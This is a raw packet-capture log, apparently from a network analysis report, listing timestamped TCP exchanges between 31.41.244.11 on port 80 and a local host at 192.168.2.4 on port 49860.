                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.568176031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.568242073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.569982052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.570036888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.570060968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.570110083 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.571836948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.571918011 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.571950912 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.572005033 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.573719025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.573770046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.573848963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.573911905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.575623989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.575714111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.575736046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.575797081 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.577486992 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.577573061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.577610970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.577706099 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.579381943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.579451084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.579489946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.579560041 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.581362963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.581440926 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.581480026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.581542015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.583133936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.583230019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.583250046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.583286047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.585040092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.585114956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.585161924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.585263968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.586940050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.587049007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.587090969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.587090969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.588798046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.588855028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.588896990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.588944912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.590688944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.590755939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.590789080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.590833902 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.592592955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.592694998 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.592730999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.592798948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.594474077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.594611883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.594631910 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.594662905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.596340895 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.596398115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.596445084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.596493006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.598232985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.598287106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.598357916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.598440886 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.600115061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.600222111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.600404024 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.600404024 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.602030039 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.602112055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.602147102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.602204084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.603892088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.603946924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.604018927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.604062080 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.605770111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.605870962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.605891943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.605951071 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.607685089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.607755899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.607770920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.607834101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.609580994 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.609658003 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.609688997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.609769106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.611450911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.611546993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.611562967 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.611614943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.613316059 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.613435984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.613445997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.613539934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.615192890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.615289927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.615298986 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.615360022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.617105007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.617204905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.617225885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.617264032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.618992090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.619098902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.619106054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.619174957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.620855093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.620919943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.620994091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.621114016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.622785091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.622925997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.623193979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.623279095 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.624635935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.624703884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.624748945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.624854088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.626507044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.626620054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.626638889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.626702070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.628401041 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.628557920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.628580093 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.628597021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.630280018 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.630374908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.630393982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.630459070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.632186890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.632251024 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.632277012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.632386923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.634047985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.634126902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.634284973 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.634284973 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.731249094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.731338024 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.732481003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.732566118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.733860970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.733899117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.733936071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.733951092 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.733951092 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.733972073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.733987093 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.734025002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.734956980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.735095978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.735251904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.735304117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.736701965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.736741066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.736810923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.736810923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.738214016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.738250017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.739654064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.739708900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.739809990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.740595102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.741288900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.741324902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.741616011 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.741652012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.741677999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.742080927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.742912054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.743056059 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.744446039 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.744577885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.744610071 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.745870113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.745991945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.746259928 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.747347116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.747474909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.747539043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.748744011 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.748886108 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.748967886 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.750190020 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.750328064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.750368118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.751625061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.751734972 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.751847029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.753024101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.753107071 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.753153086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.753204107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.754429102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.754497051 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.754590988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.754970074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.755870104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.755903959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.757216930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.757297993 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.757373095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.758564949 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.758635044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.758668900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.759921074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.760034084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.760215998 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.760874033 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.761270046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.761393070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.761430979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.762634993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.762733936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.762778044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.762778044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.764374971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.764637947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.764763117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.765364885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.765479088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.766700029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.766818047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.766855955 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.768075943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.768186092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.768316031 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.769427061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.769556046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.769650936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.770777941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.770840883 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.770903111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.772161961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.772257090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.772319078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.773514032 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.773646116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.774923086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.774986029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.775134087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.775336027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.776248932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.776339054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.777587891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.777638912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.777719975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.778989077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.779064894 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.779112101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.780328035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.780421019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.780436039 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.781672001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.781774044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.781904936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.783035040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.783133030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.783154964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.784403086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.784503937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.784559965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.785742044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.785867929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.785953045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.785980940 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.787110090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.787251949 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.787255049 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.787318945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.788507938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.788578987 CET4986080192.168.2.431.41.244.11
